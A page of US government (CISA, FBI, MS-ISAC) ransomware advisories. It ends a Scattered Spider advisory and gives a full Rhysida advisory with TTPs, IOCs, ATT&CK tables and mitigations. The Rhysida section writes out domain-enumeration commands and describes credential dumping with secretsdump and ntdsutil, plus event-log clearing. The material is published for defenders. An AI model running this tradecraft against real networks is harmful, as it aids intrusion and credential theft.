Impersonating helpdesk personnel, Scattered Spider threat actors direct employees to run commercial remote access tools thereby enabling access to and command and control of the victim’s network.

Scattered Spider threat actors leverage third-party software to facilitate lateral movement and maintain persistence on a target organization’s network.

Table 16: Exfiltration

Technique Title

ID

Use

Exfiltration

TA0010

Scattered Spider threat actors exfiltrate data from a target network to for data extortion.

Table 17: Impact

Technique Title

ID

Use

Data Encrypted for Impact

T1486

Scattered Spider threat actors recently began encrypting data on a target network and demanding a ransom for decryption.

Scattered Spider threat actors has been observed encrypting VMware ESXi servers.

Exfiltration Over Web Service: Exfiltration to Cloud Storage

T1567.002

Scattered Spider threat actors exfiltrate data to multiple sites including U.S.-based data centers and MEGA[.]NZ.

Financial Theft

T1657

Scattered Spider threat actors monetized access to victim networks in numerous ways including extortion-enabled ransomware and data theft.

MITIGATIONS

These mitigations apply to all critical infrastructure organizations and network defenders. The FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques, thus, strengthening the secure posture for their customers.

For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.

The FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture based on the threat actor activity and to reduce the risk of compromise by Scattered Spider threat actors. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

  • Implement application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
  • Reduce threat of malicious actors using remote access tools by:
    • Auditing remote access tools on your network to identify currently used and/or authorized software.
    • Reviewing logs for execution of remote access software to detect abnormal use of programs running as a portable executable [CPG 2.T].
    • Using security software to detect instances of remote access software being loaded only in memory.
    • Requiring authorized remote access solutions to be used only from within your network over approved remote access solutions, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).
    • Blocking both inbound and outbound connections on common remote access software ports and protocols at the network perimeter.
    • Applying recommendations in the Guide to Securing Remote Access Software.
  • Implementing FIDO/WebAuthn authentication or Public Key Infrastructure (PKI)-based MFA. These MFA implementations are resistant to phishing and not suspectable to push bombing or SIM swap attacks, which are techniques known to be used by Scattered Spider actors. See CISA’s fact sheet Implementing Phishing-Resistant MFA for more information.
  • Strictly limit the use of Remote Desktop Protocol (RDP) and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:

In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:

  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
  • Maintain offline backups of data and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization limits the severity of disruption to its business practices [CPG 2.R].
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST’s standards for developing and managing password policies.
    • Use longer passwords consisting of at least eight characters and no more than 64 characters in length [CPG 2.B].
    • Store passwords in hashed format using industry-recognized password managers.
    • Add password user “salts” to shared login credentials.
    • Avoid reusing passwords [CPG 2.C].
    • Implement multiple failed login attempt account lockouts [CPG 2.G].
    • Disable password “hints.”
    • Refrain from requiring password changes more frequently than once per year.
      Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
    • Require administrator credentials to install software.
  • Require phishing-resistant multifactor authentication (MFA) for all services to the extent possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems [CPG 2.H].
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
  • Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F].
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic and activity, including lateral movement, on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
  • Install, regularly update, and enable real time detection for antivirus software on all hosts.
  • Disable unused ports and protocols [CPG 2.V].
  • Consider adding an email banner to emails received from outside your organization [CPG 2.M].
  • Disable hyperlinks in received emails.
  • Ensure all backup data is encrypted, immutable (i.e., ensure backup data cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 4-17).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

REPORTING

FBI and CISA are seeking any information that can be shared, to include a sample ransom note, communications with Scattered Spider group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, report the incident to the FBI Internet Crime Complaint Center (IC3) at IC3.gov, or CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).

REFERENCES

[1] MITRE ATT&CK – Scattered Spider
[2] Trellix – Scattered Spider: The Modus Operandi
[3] Crowdstrike – Not a SIMulation: CrowdStrike Investigations Reveal Intrusion Campaign Targeting Telco and BPO Companies
[4] Crowdstrike – SCATTERED SPIDER Exploits Windows Security Deficiencies with Bring-Your-Own-Vulnerable-Driver Tactic in Attempt to Bypass Endpoint Security
[5] Malwarebytes – Ransomware group steps up, issues statement over MGM Resorts compromise

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and CISA.

VERSION HISTORY

November 16, 2023: Initial version.

Categories
alerts

CISA, FBI, and MS-ISAC Release Advisory on Rhysida Ransomware

Today, the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released a joint Cybersecurity Advisory (CSA), #StopRansomware: Rhysida Ransomware, to disseminate known Rhysida ransomware indicators of compromise (IOCs), detection methods, and tactics, techniques, and procedures (TTPs) identified through investigations as recently as September 2023.

Observed as a ransomware-as-a-service (RaaS) model, Rhysida actors have compromised organizations in education, manufacturing, information technology, and government sectors and any ransom paid are split between the group and affiliates. Rhysida actors leverage external-facing remote services, such as virtual private networks (VPNs), Zerologon vulnerability (CVE-2020-1472), and phishing campaigns to gain initial access and persistence within a network.

CISA, FBI, and MS-ISAC encourage organizations review the joint CSA for recommended mitigations to reduce the likelihood and impact of Rhysida and other ransomware incidents. For more information, see CISA’s #StopRansomware webpage, which includes the updated #StopRansomware Guide.

Categories
alerts

#StopRansomware: Rhysida Ransomware

SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known Rhysida ransomware IOCs and TTPs identified through investigations as recently as September 2023. Rhysida—an emerging ransomware variant—has predominately been deployed against the education, healthcare, manufacturing, information technology, and government sectors since May 2023. The information in this CSA is derived from related incident response investigations and malware analysis of samples discovered on victim networks.

FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of Rhysida ransomware and other ransomware incidents.

Download the PDF version of this report:

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the ATT&CK Tactics and Techniques section for tables mapped to the threat actors’ activity.

Overview

Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors. Open source reporting details similarities between Vice Society (DEV-0832)[1] activity and the actors observed deploying Rhysida ransomware. Additionally, open source reporting[2] has confirmed observed instances of Rhysida actors operating in a ransomware-as-a-service (RaaS) capacity, where ransomware tools and infrastructure are leased out in a profit-sharing model. Any ransoms paid are then split between the group and the affiliates.

For additional information on Vice Society actors and associated activity, see the joint CSA #StopRansomware: Vice Society.

Initial Access

Rhysida actors have been observed leveraging external-facing remote services to initially access and persist within a network. Remote services, such as virtual private networks (VPNs), allow users to connect to internal enterprise network resources from external locations. Rhysida actors have commonly been observed authenticating to internal VPN access points with compromised valid credentials [T1078], notably due to organizations lacking MFA enabled by default. Additionally, actors have been observed exploiting Zerologon (CVE-2020-1472)—a critical elevation of privileges vulnerability in Microsoft’s Netlogon Remote Protocol [T1190]—as well as conducting successful phishing attempts [T1566]. Note: Microsoft released a patch for CVE-2020-1472 on August 11, 2020.[3]

Living off the Land

Analysis identified Rhysida actors using living off the land techniques, such as creating Remote Desktop Protocol (RDP) connections for lateral movement [T1021.001], establishing VPN access, and utilizing PowerShell [T1059.001]. Living off the land techniques include using native (built into the operating system) network administration tools to perform operations. This allows the actors to evade detection by blending in with normal Windows systems and network activities.

Ipconfig [T1016], whoami [T1033], nltest [T1482], and several net commands have been used to enumerate victim environments and gather information about domains. In one instance of using compromised credentials, actors leveraged net commands within PowerShell to identify logged-in users and performed reconnaissance on network accounts within the victim environment. Note: The following commands were not performed in the exact order listed.

  • net user [username] /domain [T1087.002]
  • net group “domain computers” /domain [T1018]
  • net group “domain admins” /domain [T1069.002]
  • net localgroup administrators [T1069.001]

Analysis of the master file table (MFT)[4] identified the victim system generated the ntuser.dat registry hive, which was created when the compromised user logged in to the system for the first time. This was considered anomalous due to the baseline of normal activity for that particular user and system. Note: The MFT resides within the New Technology File System (NTFS) and houses information about a file including its size, time and date stamps, permissions, and data content.

Leveraged Tools

Table 1 lists legitimate tools Rhysida actors have repurposed for their operations. The legitimate tools listed in this joint CSA are all publicly available. Use of these tools should not be attributed as malicious without analytical evidence to support they are used at the direction of or controlled by threat actors.

Disclaimer: Organizations are encouraged to investigate and vet use of these tools prior to performing remediation actions.

Table 1: Tools Leveraged by Rhysida Actors

Name

Description

cmd.exe

The native command line prompt utility.

PowerShell.exe

A native command line tool used to start a Windows PowerShell session in a Command Prompt window.

PsExec.exe

A tool included in the PsTools suite used to execute processes remotely. Rhysida actors heavily leveraged this tool for lateral movement and remote execution.

mstsc.exe

A native tool that establishes an RDP connection to a host.

PuTTY.exe

Rhysida actors have been observed creating Secure Shell (SSH) PuTTy connections for lateral movement. In one example, analysis of PowerShell console host history for a compromised user account revealed Rhysida actors leveraged PuTTy to remotely connect to systems via SSH [T1021.004].

PortStarter

A back door script written in Go that provides functionality for modifying firewall settings and opening ports to pre-configured command and control (C2) servers.[1]

secretsdump

A script used to extract credentials and other confidential information from a system. Rhysida actors have been observed using this for NTDS dumping [T1003.003] in various instances.

ntdsutil.exe

A standard Windows tool used to interact with the NTDS database. Rhysida actors used this tool to extract and dump the NTDS.dit database from the domain controller containing hashes for all Active Directory (AD) users.

Note: It is strongly recommended that organizations conduct domain-wide password resets and double Kerberos TGT password resets if any indication is found that the NTDS.dit file was compromised.

AnyDesk

A common software that can be maliciously used by threat actors to obtain remote access and maintain persistence [T1219]. AnyDesk also supports remote file transfer.

wevtutil.exe

A standard Windows Event Utility tool used to view event logs. Rhysida actors used this tool to clear a significant number of Windows event logs, including system, application, and security logs [T1070.001].

PowerView

A PowerShell tool used to gain situational awareness of Windows domains. Review of PowerShell event logs identified Rhysida actors using this tool to conduct additional reconnaissance-based commands and harvest credentials.

Rhysida Ransomware Characteristics

Execution

In one investigation, Rhysida actors created two folders in the C: drive labeled in and out, which served as a staging directory (central location) for hosting malicious executables. The in folder contained file names in accordance with host names on the victim’s network, likely imported through a scanning tool. The out folder contained various files listed in Table 2 below. Rhysida actors deployed these tools and scripts to assist system and network-wide encryption.

Table 2: Malicious Executables Affiliated with Rhysida Infections

File Name

Hash (SHA256)

Description

conhost.exe

6633fa85bb234a75927b23417313e51a4c155e12f71da3959e168851a600b010

A ransomware binary.

psexec.exe

078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b

A file used to execute a process on a remote or local host.

S_0.bat

1c4978cd5d750a2985da9b58db137fc74d28422f1e087fd77642faa7efe7b597

A batch script likely used to place 1.ps1 on victim systems for ransomware staging purposes [T1059.003].

1.ps1

4e34b9442f825a16d7f6557193426ae7a18899ed46d3b896f6e4357367276183

Identifies an extension block list of files to encrypt and not encrypt.

S_1.bat

97766464d0f2f91b82b557ac656ab82e15cae7896b1d8c98632ca53c15cf06c4

A batch script that copies conhost.exe (the encryption binary) on an imported list of host names within the C:WindowsTemp directory of each system.

S_2.bat

918784e25bd24192ce4e999538be96898558660659e3c624a5f27857784cd7e1

Executes conhost.exe on compromised victim systems, which encrypts and appends the extension of .Rhysida across the environment.

Rhysida ransomware uses a Windows 64-bit Portable Executable (PE) or common object file format (COFF) compiled using MinGW via the GNU Compiler Collection (GCC), which supports various programming languages such as C, C++, and Go. The cryptographic ransomware application first injects the PE into running processes on the compromised system [T1055.002]. Additionally, third-party researchers identified evidence of Rhysida actors developing custom tools with program names set to “Rhysida-0.1” [T1587].

Encryption

After mapping the network, the ransomware encrypts data using a 4096-bit RSA encryption key with a ChaCha20 algorithm [T1486]. The algorithm features a 256-bit key, a 32-bit counter, and a 96-bit nonce along with a four-by-four matrix of 32-bit words in plain text. Registry modification commands [T1112] are not obfuscated, displayed as plain-text strings and executed via cmd.exe.

Rhysida’s encryptor runs a file to encrypt and modify all encrypted files to display a .rhysida extension.[5] Following encryption, a PowerShell command deletes the binary [T1070.004] from the network using a hidden command window [T1564.003]. The Rhysida encryptor allows arguments -d (select a directory) and -sr (file deletion), defined by the authors of the code as parseOptions.[6] After the lines of binary strings complete their tasks, they delete themselves through the control panel to evade detection.

Data Extortion

Rhysida actors reportedly engage in “double extortion” [T1657]—demanding a ransom payment to decrypt victim data and threatening to publish the sensitive exfiltrated data unless the ransom is paid.[5],[7] Rhysida actors direct victims to send ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. As shown in Figure 1, Rhysida ransomware drops a ransom note named “CriticalBreachDetected” as a PDF file—the note provides each company with a unique code and instructions to contact the group via a Tor-based portal.

Figure 1: Rhysida Ransom Note
Figure 1: Rhysida Ransom Note

Identified in analysis and also listed in open source reporting, the contents of the ransom note are embedded as plain-text in the ransom binary, offering network defenders an opportunity to deploy string-based detection for alerting on evidence of the ransom note. Rhysida threat actors may target systems that do not use command-line operating systems. The format of the PDF ransom notes could indicate that Rhysida actors only target systems that are compatible with handling PDF documents.[8]

INDICATORS OF COMPROMISE

On November 10, 2023, Sophos published TTPs and IOCs identified from analysis conducted for six separate incidents.[9] The C2 IP addresses listed in Table 3 were derived directly from Sophos’ investigations and are listed on GitHub among other indicators.[10]

Table 3: C2 IP Addresses Used for Rhysida Operations

C2 IP Address

5.39.222[.]67

5.255.99[.]59

51.77.102[.]106

108.62.118[.]136

108.62.141[.]161

146.70.104[.]249

156.96.62[.]58

157.154.194[.]6

Additional IOCs were obtained from FBI, CISA, and the MS-ISAC’s investigations and analysis. The email addresses listed in Table 4 are associated with Rhysida actors’ operations. Rhysida actors have been observed creating Onion Mail email accounts for services or victim communication, commonly in the format: [First Name][Last Name]@onionmail[.]org.

Table 4: Email Addresses Used to Support Rhysida Operations

Email Address

rhysidaeverywhere@onionmail[.]org

rhysidaofficial@onionmail[.]org

Rhysida actors have also been observed using the following files and executables listed in Table 5 to support their operations.

Disclaimer: Organizations are encouraged to investigate the use of these files for related signs of compromise prior to performing remediation actions.

Table 5: Files Used to Support Rhysida Operations

File Name

Hash (SHA256)

Sock5.sh

48f559e00c472d9ffe3965ab92c6d298f8fb3a3f0d6d203cd2069bfca4bf3a57

PsExec64.exe

edfae1a69522f87b12c6dac3225d930e4848832e3c551ee1e7d31736bf4525ef

PsExec.exe

078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b

PsGetsid64.exe

201d8e77ccc2575d910d47042a986480b1da28cf0033e7ee726ad9d45ccf4daa

PsGetsid.exe

a48ac157609888471bf8578fb8b2aef6b0068f7e0742fccf2e0e288b0b2cfdfb

PsInfo64.exe

de73b73eeb156f877de61f4a6975d06759292ed69f31aaf06c9811f3311e03e7

PsInfo.exe

951b1b5fd5cb13cde159cebc7c60465587e2061363d1d8847ab78b6c4fba7501

PsLoggedon64.exe

fdadb6e15c52c41a31e3c22659dd490d5b616e017d1b1aa6070008ce09ed27ea

PsLoggedon.exe

d689cb1dbd2e4c06cd15e51a6871c406c595790ddcdcd7dc8d0401c7183720ef

PsService64.exe

554f523914cdbaed8b17527170502199c185bd69a41c81102c50dbb0e5e5a78d

PsService.exe

d3a816fe5d545a80e4639b34b90d92d1039eb71ef59e6e81b3c0e043a45b751c

Eula.txt

8329bcbadc7f81539a4969ca13f0be5b8eb7652b912324a1926fc9bfb6ec005a

psfile64.exe

be922312978a53c92a49fefd2c9f9cc098767b36f0e4d2e829d24725df65bc21

psfile.exe

4243dc8b991f5f8b3c0f233ca2110a1e03a1d716c3f51e88faf1d59b8242d329

pskill64.exe

7ba47558c99e18c2c6449be804b5e765c48d3a70ceaa04c1e0fae67ff1d7178d

pskill.exe

5ef168f83b55d2cbd2426afc5e6fa8161270fa6a2a312831332dc472c95dfa42

pslist64.exe

d3247f03dcd7b9335344ebba76a0b92370f32f1cb0e480c734da52db2bd8df60

pslist.exe

ed05f5d462767b3986583188000143f0eb24f7d89605523a28950e72e6b9039a

psloglist64.exe

5e55b4caf47a248a10abd009617684e969dbe5c448d087ee8178262aaab68636

psloglist.exe

dcdb9bd39b6014434190a9949dedf633726fdb470e95cc47cdaa47c1964b969f

pspasswd64.exe

8d950068f46a04e77ad6637c680cccf5d703a1828fbd6bdca513268af4f2170f

pspasswd.exe

6ed5d50cf9d07db73eaa92c5405f6b1bf670028c602c605dfa7d4fcb80ef0801

psping64.exe

d1f718d219930e57794bdadf9dda61406294b0759038cef282f7544b44b92285

psping.exe

355b4a82313074999bd8fa1332b1ed00034e63bd2a0d0367e2622f35d75cf140

psshutdown64.exe

4226738489c2a67852d51dbf96574f33e44e509bc265b950d495da79bb457400

psshutdown.exe

13fd3ad690c73cf0ad26c6716d4e9d1581b47c22fb7518b1d3bf9cfb8f9e9123

pssuspend64.exe

4bf8fbb7db583e1aacbf36c5f740d012c8321f221066cc68107031bd8b6bc1ee

pssuspend.exe

95a922e178075fb771066db4ab1bd70c7016f794709d514ab1c7f11500f016cd

PSTools.zip

a9ca77dfe03ce15004157727bb43ba66f00ceb215362c9b3d199f000edaa8d61

Pstools.chm

2813b6c07d17d25670163e0f66453b42d2f157bf2e42007806ebc6bb9d114acc

psversion.txt

8e43d1ddbd5c129055528a93f1e3fab0ecdf73a8a7ba9713dc4c3e216d7e5db4

psexesvc.exe

This artifact is created when a user establishes a connection using psexec. It is removed after the connection is terminated, which is why there is no hash available for this executable.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 6-15 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Additional notable TTPs have been published by the Check Point Incident Response Team.[11]

Table 6: Resource Development

Technique Title

ID

Use

Develop Capabilities

T1587

Rhysida actors have been observed developing resources and custom tools, particularly with program names set to “Rhysida-0.1” to gain access to victim systems.

Table 7: Initial Access

Technique Title

ID

Use

Valid Accounts

T1078

Rhysida actors are known to use valid credentials to access internal VPN access points of victims.

Exploit Public-Facing Application

T1190

Rhysida actors have been identified exploiting Zerologon, a critical elevation of privilege vulnerability within Microsoft’s Netlogon Remote Protocol.

Phishing

T1566

Rhysida actors are known to conduct successful phishing attacks.

Table 8: Execution

Technique Title

ID

Use

Command and Scripting Interpreter: PowerShell

T1059.001

Rhysida actors used PowerShell commands (ipconfig, nltest, net) and various scripts to execute malicious actions.

Command and Scripting Interpreter: Windows Command Shell

T1059.003

Rhysida actors used batch scripting to place 1.ps1 on victim systems to automate ransomware execution.

Table 9: Privilege Escalation

Technique Title

ID

Use

Process Injection: Portable Executable Injection

T1055.002

Rhysida actors injected a Windows 64-bit PE cryptographic ransomware application into running processes on compromised systems.

Table 10: Defense Evasion

Technique Title

ID

Use

Indicator Removal: Clear Windows Event Logs

T1070.001

Rhysida actors used wevtutil.exe to clear Windows event logs, including system, application, and security logs.

Indicator Removal: File Deletion

T1070.004

Rhysida actors used PowerShell commands to delete binary strings.

Hide Artifacts: Hidden Window

T1564.003

Rhysida actors have executed hidden PowerShell windows.

Table 11: Credential Access

Technique Title

ID

Use

OS Credential Dumping: NTDS

T1003.003

Rhysida actors have been observed using secretsdump to extract credentials and other confidential information from a system, then dumping NTDS credentials.

Modify Registry

T1112

Rhysida actors were observed running registry modification commands via cmd.exe.

Table 12: Discovery

Technique Title

ID

Use

System Network Configuration Discovery

T1016

Rhysida actors used the ipconfig command to enumerate victim system network settings.

Remote System Discovery

T1018

Rhysida actors used the command net group “domain computers” /domain to enumerate servers on a victim domain.

System Owner/User Discovery

T1033

Rhysida actors leveraged whoami and various net commands within PowerShell to identify logged-in users.

Permission Groups Discovery: Local Groups

T1069.001

Rhysida actors used the command net localgroup administrators to identify accounts with local administrator rights.

Permission Groups Discovery: Domain Groups

T1069.002

Rhysida actors used the command net group “domain admins” /domain to identify domain administrators.

Account Discovery: Domain Account

T1087.002

Rhysida actors used the command net user [username] /domain to identify account information.

Domain Trust Discovery

T1482

Rhysida actors used the Windows utility nltest to enumerate domain trusts.

Table 13: Lateral Movement

Technique Title

ID

Use

Remote Services: Remote Desktop Protocol

T1021.001

Rhysida actors are known to use RDP for lateral movement.

Remote Services: SSH

T1021.004

Rhysida actors used compromised user credentials to leverage PuTTy and remotely connect to victim systems via SSH.

Table 14: Command and Control

Technique Title

ID

Use

Remote Access Software

T1219

Rhysida actors have been observed using the AnyDesk software to obtain remote access to victim systems and maintain persistence.

Table 15: Impact

Technique Title

ID

Use

Data Encrypted for Impact

T1486

Rhysida actors encrypted victim data using a 4096-bit RSA encryption key that implements a ChaCha20 algorithm.

Financial Theft

T1657

Rhysida actors reportedly engage in “double extortion”— demanding a ransom payment to decrypt victim data and threatening to publish the sensitive exfiltrated data unless the ransom is paid.

MITIGATIONS

FBI, CISA, and the MS-ISAC recommend that organizations implement the mitigations below to improve your organization’s cybersecurity posture. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

These mitigations apply to all critical infrastructure organizations and network defenders. FBI, CISA, and the MS-ISAC recommend incorporating secure-by-design and -default principles, limiting the impact of ransomware techniques and strengthening overall security posture. For more information on secure by design, see CISA’s Secure by Design webpage.

  • Require phishing-resistant MFA for all services to the extent possible, particularly for webmail, VPN, and accounts that access critical systems [CPG 2.H].
  • Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.N].
  • Implement verbose and enhanced logging within processes such as command line auditing[12] and process tracking[13].
  • Restrict the use of PowerShell using Group Policy and only grant access to specific users on a case-by-case basis. Typically, only those users or administrators who manage the network or Windows operating systems should be permitted to use PowerShell [CPG 2.E].
  • Update Windows PowerShell or PowerShell Core to the latest version and uninstall all earlier PowerShell versions. Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities [CPG 1.E, 2.S, 2.T].
  • Enable enhanced PowerShell logging [CPG 2.T, 2.U].
    • PowerShell logs contain valuable data, including historical operating system and registry interaction and possible TTPs of a threat actor’s PowerShell use.
    • Ensure PowerShell instances (using the latest version) have module, script block, and transcription logging enabled (e.g., enhanced logging).
    • The two logs that record PowerShell activity are the PowerShell Windows event log and the PowerShell operational log. FBI, CISA, and the MS-ISAC recommend turning on these two Windows event logs with a retention period of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data has been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as possible.
  • Restrict the use of RDP and other remote desktop services to known user accounts and groups. If RDP is necessary, apply best practices such as [CPG 2.W]:
    • Implement MFA for privileged accounts using RDP.
    • Use Remote Credential Guard[14] to protect credentials, particularly domain administrator or other high value accounts.
    • Audit the network for systems using RDP.
    • Close unused RDP ports.
    • Enforce account lockouts after a specified number of attempts.
    • Log RDP login attempts.
  • Secure remote access tools by:
    • Implementing application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent the installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important as antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
    • Apply the recommendations in CISA’s joint Guide to Securing Remote Access Software.

In addition, FBI, CISA, and the MS-ISAC recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:

  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
  • Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F].
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a network monitoring tool. To aid in detecting ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
  • Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 2.E].
  • Implement time-based access for accounts set at the admin level and higher [CPG 2.A, 2.E]. For example, the just-in-time (JIT) access method provisions privileged access when needed and can support the enforcement of PoLP (as well as the zero trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the AD level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).
  • Maintain offline backups of data and regularly maintain backups and their restoration (daily or weekly at minimum). By instituting this practice, organizations limit the severity of disruption to business operations [CPG 2.R].
  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].
  • Forward log files to a hardened centralized logging server, preferably on a segmented network [CPG 2.F]. Review logging retention rates, such as for VPNs and network-based logs.
  • Consider adding an email banner to emails received from outside your organization [CPG 2.M].
  • Disable hyperlinks in received emails.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI, CISA, and the MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 6-15).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

FBI, CISA, and the MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

REPORTING

FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Rhysida actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

Additional details requested include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host and network-based indicators.

